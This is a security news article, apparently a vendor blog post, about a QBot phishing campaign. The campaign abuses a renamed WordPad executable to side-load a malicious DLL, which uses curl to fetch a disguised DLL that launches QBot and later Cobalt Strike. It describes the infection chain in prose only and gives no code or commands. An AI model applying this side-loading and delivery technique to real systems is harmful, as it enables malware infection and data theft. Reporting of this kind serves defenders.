New QBot Malware Campaign Exploits WordPad for Infection
Phishing, DLL Hijacking and Lateral Movement, Among the Attack Techniques.
Last updated on June 2, 2023
A recent QBot malware campaign has been observed leveraging a DLL hijacking vulnerability in the WordPad utility application to evade detection by security measures. Exploiting Windows programs for malicious purposes is an increasingly prevalent trend observed among threat actors.
According to ProxyLife, a cybersecurity specialist and member of Cryptolaemus, the recently discovered QBot phishing campaign is exploiting a DLL hijacking vulnerability present in the WordPad executable, write[.]exe.
It Starts with Phishing
This attack uses phishing emails that trick recipients into downloading malware. Upon clicking the hyperlink, a ZIP file is downloaded from the remote server and given a random name.
WordPad’s executable, document[.]exe, and the DLL file, edputil[.]dll (for the DLL hijack), are both contained within this ZIP archive. The document[.]exe is actually a renamed version of the official Write[.]exe.
Once Executed, the DLL Hijacking Begins
When the document[.]exe is executed, it attempts to load a genuine DLL file called edputil[.]dll, which is typically located in the C:WindowsSystem32 folder.
When the executable attempts to load edputil[.]dll, it looks for it in the specified folder. The attacker employs a malicious version of the edputil[.]dll DLL, which is kept in the same folder that the application checks.
When a malicious DLL is discovered during a scan, it is used to load the WinWord. When the DLL is loaded, curl[.]exe is used to download another DLL file disguised as a PNG file. The QBot malware is launched by this DLL file.
Post Infection Behaviour
QBot steals emails for further phishing attacks and downloads other payloads, such as Cobalt Strike, a post-exploitation toolkit used to gain initial access to the targeted system, while running in the background.
Abusing Windows 10 WordPad executables is consistent with the same tactic previously used by the operators of the QBot malware, explains Cyware. The fact that it can impersonate legitimate Windows programs and spread laterally makes it a particularly dangerous threat.
Madalina, a seasoned digital content creator at Heimdal®, blends her passion for cybersecurity with an 8-year background in PR & CSR consultancy. Skilled in making complex cyber topics accessible, she bridges the gap between cyber experts and the wider audience with finesse.